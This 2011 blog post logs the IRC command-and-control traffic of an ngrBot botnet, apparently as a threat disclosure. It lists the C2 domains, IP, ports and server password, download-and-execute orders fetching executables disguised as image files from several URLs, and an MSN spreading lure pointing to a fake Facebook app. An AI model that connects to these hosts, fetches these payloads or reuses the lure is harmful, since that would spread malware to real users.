up.scorevidic.net(botnet hosted in United States Baltimore Gandi Us Inc)

By Pig, April 15, 2011

* Dns resolving up.scorevidic.net

* Dns resolved up.scorevidic.net to 173.246.103.19

* Dns resolving av.psybnc.cz

* Dns resolved av.psybnc.cz to 173.246.103.19

* Dns resolving av.shannen.cc

* Dns resolved av.shannen.cc to 173.246.103.19

173.246.103.19 3211

173.246.103.19 4949

173.246.103.19 5900

Remote Host Port Number
173.246.103.19 4949 PASS ngrBot

194.28.44.217 80

213.251.170.52 80

216.45.58.150 80

70.38.98.239 80

95.64.10.203 80

PRIVMSG #t :[MSN]: Updated MSN spread message to “:| http://apps.facebook.com/xxx_photoo/index.php?=2525453”
PRIVMSG #new :[d=”http://www.sitepalace.com/gamil/lokiB.jpeg” s=”169985 bytes”] Update error: MD5 mismatch (271D4D0EBDC11F17B3E5E3D6416EE049 != 9798A05FD6A79E8A75F632742F922ACA)
PRIVMSG #new :[d=”http://p-file.su/data2/10193-1.exe” s=”142336 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0
PRIVMSG #r :[Ruskill]: Detected File: “C:Documents and SettingsUserNameApplication Data2.tmp”
PRIVMSG #new :[d=”http://img105.herosh.com/2011/04/15/763089596.gif” s=”81408 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data3.tmp” – Download retries: 0
PRIVMSG #new :[d=”http://img105.herosh.com/2011/04/12/451140916.gif” s=”78336 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data8.tmp” – Download retries: 0
NICK n{US|XPa}onidexy
USER onidexy 0 0 :onidexy
JOIN ##RedEm-001## redem
JOIN #t
JOIN #new
PRIVMSG #t :[MSN]: Updated MSN spread interval to “4”

UPDATE:
USER gdetsuk 0 0 :gdetsuk
JOIN ##RedEm-001## redem
JOIN #t
JOIN #new
PRIVMSG #t :[MSN]: Updated MSN spread interval to “3”
PRIVMSG #t :[MSN]: Updated MSN spread message to “:| http://apps.facebook.com/xxx_photoo/index.php?=”
NICK VirUs-xszppj
PRIVMSG #t :[d=”https://rapidshare.com/files/457931204/SerMsvB.exe” s=”140800 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataZcxaxz.exe” – Download retries: 0
PONG :TESTING1.VirUs.HERE
USER VirUs “” “omt” :
8Coded
8VirUs..
JOIN #MarCH# Testbro
PRIVMSG #MarCH# :Success.
NICK n{US|XPa}gdetsuk

UPDATE:
Remote Host Port Number
173.246.103.19 3211 PASS ngrBot

173.246.103.19 4949 PASS ngrBot

173.246.103.19 5900 PASS ngrBot

213.251.170.52 80

USER yynmtad 0 0 :yynmtad
NICK n{US|XPa}yynmtad
NICK n{US|XPa}bbriupa
USER bbriupa 0 0 :bbriupa
NICK n{US|XPa}vsenmgs
USER vsenmgs 0 0 :vsenmgs

infos about hosting:
http://whois.domaintools.com/173.246.103.19

Categories: Uncategorized